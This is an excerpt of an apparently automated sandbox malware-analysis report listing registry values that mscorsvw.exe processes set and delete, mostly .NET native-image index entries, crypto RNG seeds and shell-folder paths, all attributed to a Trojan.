[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 CF CC 11 E2 5E DE 62 07 7E 61 0B 09 9F 21 19"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "20 36 83 96 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process mscorsvw.exe:2196 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F9 BC 87 40 0C 00 F0 EE 6A 27 04 F2 CB A9 7B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "9E 95 C3 96 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:3536 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "02 DE 4D 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 64 A3 08 DC EE 1B 4B 3A FF 35 89 F1 B9 EB 8A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The process mscorsvw.exe:3676 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 7B F3 64 DF C1 DF B9 B5 5A F2 24 B6 04 70 22"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3044 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "C0 88 DA 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "CC 4B 58 96 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D D3 8E 75 48 34 76 5C 55 E2 86 D7 30 B4 AD 1E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:2544 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 4B F8 7A D3 9B AE BE A2 05 D5 D9 9E CA 3F 04"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2564 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 8F 37 27 96 3F 58 8C 8A 66 AB 28 F1 64 BA ED"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]

The process mscorsvw.exe:1856 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 37 36 B9 17 3F C5 C5 03 9F 66 0C 51 42 68 5B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3180 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 8B 30 07 3E AE 3D 7B 09 B9 BB 33 22 A1 A9 7B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2660 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 26 EA 13 7F 28 5B 7E B4 1B 1F 41 DC B0 94 73"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2508 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 3A 47 E4 D2 43 FE D1 F6 6F 1F D8 0C 90 B6 16"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:2680 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "F2 7F EE 96 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 0B EE 2E BC AD 96 06 46 3B 26 84 2A AB 5C 46"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2872 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8A D9 37 ED C9 37 10 A1 65 92 FB A0 EB DC 46"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

